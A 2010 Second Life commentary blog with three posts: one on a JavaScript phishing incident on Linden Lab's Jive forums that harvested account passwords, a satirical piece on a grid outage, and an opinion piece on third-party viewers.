Thursday, 6 May 2010

Something Phishy About Jive!

Yesterday saw another example of LL's poor decision in adopting Clearspace's Jive software for their new forums/blogorums. The Jive powered blog software, an alternative to LL's now scrapped vBulletin boards, fell foul to a simple phishing javascript, which harvested hundreds of user names and passwords.

A presumed Russian user going under the account name of "Aels Cybertar" placed some Javascript in a private message (PM) and sent it to an, as yet, unknown amount of people. The message arrived in users' inboxes as a message from, Aels Cybertar titled, "Hi, remember me? ^.^" When opening the PM the phishy script asked for the users' SL account name and password to read the message as seen in the pic below.

While some might say that people should have noticed this it has to be taken into account what a borked piece of software Clearspace's Jive is. There has been an endless stream of criticism for LL's decision to adopt it and users have demanded a better system to work with. Recently though Jive was upgraded leading to some user satisfaction, but this revamp seemed to add just as many new bugs into the system as the new features that it added. Some people had their whole profiles deleted or were unable to even log in.

One result of this upgrade was to stop persistent log ins and thereby forcing people to log in every time they revisited the pages. I am sure that this forced increase of repeatedly having to log in with your account details and password suckered many people in to believing that Jive was just getting even more secure.

LL did though disable all PMs when made aware, but shortly after that a user with the account name "Nykon Brunsen" posted in a thread on General Discussions discussing the phishing incident the following message,

Nykon Brunsen wrote:

"Lindens... it was funny.. u have no limits to users in one PM =)

u scripted sending via ID, not name... That you have made the only thingcorrectly - have disabled PM. Here that I have received. Enjoy. PS. from russia with love^.^"

There then followed an 18 page table listing IP addresses, browsers used, account names and passwords of all those that he had captured through the phish. Whether it was the total amount or a small sample we do not know. I have reprinted an edited and extracted version below with IPs and passwords removed. Although LL say they have reset the passwords of all users who were sent the PM, whether they have opened the PM or not, some people are already saying that this is not the case.

The Flogs remain up today although all functionality/html has been disabled so it would seem the Flogs are still not secure to use. This is a big egg on their face moment for LL and Clearspace as it effectively shows that all of LL's security procedures were bypassed by one simple phishing exercise. Not only that, but it was conducted on one of their own sites over which they have received much criticism for their use of Clearspace's Jive software. The phishing ex
ercise for the moment seems to have been done for non-malicious purposes so as to show LL how open their system was and how lacking Jive was in protecting them. So far I've not heard of any user reporting missing inventory or money. The posting of users' account names and passwords on a public forum though can only be considered ill thought and criminally negligent.

Below is a shortened list of users who were caught. There were 18 pages of names and passwords and I include only 2 extracted pages here with IPs and passwords deleted as an example. I had to chuckle at one of the users who was caught and who had used a really weak password. Last week they were boasting in a forum of how, with their long, long experience in IT and installing and maintaining big corporate networks, that they could run LL's data centres and that they would have avoided last week's outage. Good to see that such superheroes can get phished and don't know how to set a strong password. I hear too that Prokofy too was hooked by the phish, she'll be relieved to know that her details didn't appear on the list that I have.

Edit: Prok has a nice first person report of it here.

If your name appears here then I would advise you to change your password if not already reset by LL.

Thursday, 29 April 2010

They Tooks My SL Away!

SL residents/users/customers/addicts
went apeshit crazy today as the guy on the corner of the internet, who sells the good stuff, was mysteriously absent for most of today.

Some dumbstruck, and in some cases just plain dumb, people hit the login screen to find their access denied because the whole of SL was down. Not just the grid, but the websites, the blogs and if rumour is to be believed, even Mark KingDonk's Thunking Machine, though further rumours persist that it is just a Hoover he turns on to make the residents' voices go away.

What people did for those nigh on nearly 12hrs is only now slowly becoming known. No doubt in several cases some were exposed to sunlight and were desperately reaching for a gamma slider. Others discovered hitherto unknown siblings, piles of mail, which forced them to remember their given name at birth and I daresay some even took the opportunity to change their underwear.

Relief wasn't too long in coming though as the Linden Overlords whipped the hamster wheels into action and lights started coming on across the grid, and going out in bedrooms and basements across the worlds. The SL Flogs, once up, were soon flooded by a previously unknown group called "The League of Idiots". I swear these people must have been sat in front of their monitors pressing refresh every 2 seconds till the site came up.

Once on to the blogs their first question was, "What's happening?", unaware of the fact that they were the only person around to answer it. Soon, the rest of league were turning up asking the same question over and over again. One suspects it was the tightness of their new underwear or the residual sun glare in their eyes that had caused them to not properly see the Grid Status update on their login screens.

Once the intial wave of idiots had self sedated and calmed down there appeared on the scene "The Regiment of The Righteously Outraged." These people had serious questions and wanted some serious answers. Nothing less than KingDonk himself being hauled into the court of public opinion and made to answer as to why SL was down while they slept in their beds was going to suffice for these people. Various numbers of the Regiment screamed that they needed to get inworld because they were concierge members and merchants and needed to be in their shops, oblivious of the fact that they wouldn't have any customers or visitors even if they could.

The grid did slowly though, after some stiff drinks and flattery, open her arms
and embrace again her long lost lovers. Even this long withheld fix was not enough though to satiate the most ardent of the Green Ink Brigade
. Back to various forums they came with some classic lines,
  • "Something I took into my inventory 10 mins before shutdown is now rezzed on my land!!!",
  • "I can't TP to my home, WHY!?!",
  • "I can login, why can't my partner ffs LL!!!!",
  • "I know it says there's inventory problems, but MY inventory isn't loading!"
To be serious for one moment. This prolonged outtage has been one of the most serious ones for LL and all of us for quite some time. What ever the cause is will no doubt be known or slowly revealed over time. It would be nice to know what is happening while we are all in limbo, but there are good commercial reasons why the likes of LL don't tell too much. Outtages such as this one are acceptable and reasonable if they are infrequent. Older SLers will remember times not so long ago when outtages were a weekly occurence and scheduled maintenance day meant 3 days of rolling restarts to fix what they broke when they were fixing something else.

We though, have to have some perspective, restraint and not go so apeshit; there is always First Life and it's not a bad place to login to every once in a while.

To finish, my award for the most hilarious and ironic post of the day goes to...

Viewer's Discretion Advised

As a supposed 70,000 Emerald users breathed a collective sigh of relief this week, with said viewer getting itself installed on the TPV Directory, I've noticed an emerging bitter evolutionary struggle breaking out.

While the debate raged across various blogs and threads about whether Emerald would or should make the directory, its proponents, and users of other viewers, began to engage in a "throw and see what sticks" battle. The argument runs,

Emerald user: "If Emerald doesn't make the directory then I won't be able to use (insert an Emerald function). All the other viewers don't have that function, therefore they are shit and I shouldn't be forced to use shit!"

Other user: "But why would you want that function? It's so retarded, you kid! No way does that help me do (insert creative activity), you should use my viewer!"

Ver.2/S20 user: "WTF! ZOMG! Are you two friggin' insane? Have you just stepped off the ark? Stop talking shit, my Ver.2/S20 pwns your n00by viewers! I got da, Media on Da Prim! You suck, upgrade now!"

And of course, it is at this point of unrivalled Socratic reasoning that both Emerald and non v2 users will for one moment put aside their differences to beat ten bells of crap out of the v2 poster for being an asswipe fanboy/girl.

The truth is, they are all wrong and they are all right. There is no one viewer that satisfies all my requirements and needs, but there are some that are perfect for when I'm doing a particular activity. If I'm building I will tend to use Emerald for preference or maybe Snowglobe, and if I'm doing more media orientated activity then I will use Kirsten's S20.

The difference is though, I will not go round dissing any other viewer that somebody else uses. I am me, I do what I do in SL, and those viewers cover all my needs. I am building more and more with Kirsten's S20 and it maybe that in a few months that will be my sole viewer. Even so, it will not make the S20 the best viewer in SL, it will just be the best viewer for me.

If we can't have the perfect viewer, which has all the bells and whistles then the next best thing is that we have a range of viewers that provide all the functions we need and desire. This is what we have now and it's a better situation than we've had for 90% of Second Life's existence.